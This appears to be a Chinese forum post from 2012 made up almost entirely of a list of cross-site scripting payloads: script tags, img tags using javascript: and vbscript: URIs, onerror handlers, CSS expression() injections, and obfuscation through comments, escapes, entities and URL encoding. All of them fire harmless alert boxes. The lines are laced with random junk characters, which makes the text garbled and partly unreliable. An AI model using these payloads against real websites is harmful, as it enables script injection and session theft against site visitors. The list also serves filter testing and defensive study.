<script>alert("跨站")</script> (最常用)& C: n' U! V; v+ ?
<img scr=javascript:alert("跨站")></img>
+ R! W* T$ G# G& |% u9 {<img scr="javascript: alert(/跨站/)></img>. F1 k" J1 j% O m7 _5 t- v
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
0 m" E/ `, `9 R+ j. `+ M# X; c. n<img scr="#" onerror=alert(/跨站/)></img>6 [ I, U% w5 n* D) y I
<img scr="#" style="xss:expression(alert(/xss/));"></img>: x6 V' f& c5 |& R
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)* v5 x! g3 ?7 ]
<img src=vbscript:msgbox ("xss")></img>! {: B+ o( d# D; r3 @$ M
<style> input {left:expression (alert('xss'))}</style>1 ~- q) m+ G, T" A
<div style={left:expression (alert('xss'))}></div>
6 a& r* j3 ?% d# S6 k; a<div style={left:exp/* */ression (alert('xss'))}></div>
2 G) p; l4 _+ b( x5 f' g<div style={left:\0065\0078ression (alert('xss'))}></div>* r0 b* q$ B4 o: d6 F! U
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div> _8 E. n! K4 {- w$ p' M6 g( y
unicode <div style="{left:expRessioN (alert('xss'))}">
! E) m+ x2 K8 E4 q1 X$ Y; k) P
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["2 K4 o' F5 f! |1 x' Y" A
|
发表于 2012-9-15 14:09:13
收藏
支持
反对